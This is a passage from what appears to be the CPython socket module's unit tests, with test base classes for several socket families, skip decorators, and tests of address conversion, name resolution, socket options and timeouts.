"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
socket_helper.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class UDPLITETestBase(InetTestBase):
"""Base class for UDPLITE-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = socket_helper.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
class UDPLITE6TestBase(Inet6TestBase):
"""Base class for UDPLITE-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType', str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test3542SocketOptions(self):
# Ref. issue #35569 and https://tools.ietf.org/html/rfc3542
opts = {
'IPV6_CHECKSUM',
'IPV6_DONTFRAG',
'IPV6_DSTOPTS',
'IPV6_HOPLIMIT',
'IPV6_HOPOPTS',
'IPV6_NEXTHOP',
'IPV6_PATHMTU',
'IPV6_PKTINFO',
'IPV6_RECVDSTOPTS',
'IPV6_RECVHOPLIMIT',
'IPV6_RECVHOPOPTS',
'IPV6_RECVPATHMTU',
'IPV6_RECVPKTINFO',
'IPV6_RECVRTHDR',
'IPV6_RECVTCLASS',
'IPV6_RTHDR',
'IPV6_RTHDRDSTOPTS',
'IPV6_RTHDR_TYPE_0',
'IPV6_TCLASS',
'IPV6_USE_MIN_MTU',
}
for opt in opts:
self.assertTrue(
hasattr(socket, opt), f"Missing RFC3542 socket option '{opt}'"
)
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if fqhn not in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [socket_helper.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test socket_helper.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [socket_helper.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__, 0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = (
l_bad_values +
[_testcapi.INT_MIN-1, _testcapi.INT_MAX+1] +
[1 << 16, _testcapi.INT_MAX]
)
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has no appropriate service to test (TBD?)')
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as it has a
# non-standard port/protocol entry that breaks this assumption
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = socket_helper.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate that it is
# reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# A new socket should start with SO_REUSEADDR cleared (reuse == 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = socket_helper.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = socket_helper.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if socket_helper.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23) and not (sys.platform == 'OpenVMS'):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with socket_helper.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain, 0, socket.AF_UNSPEC, socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(TimeoutError, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has no correct signal handling')
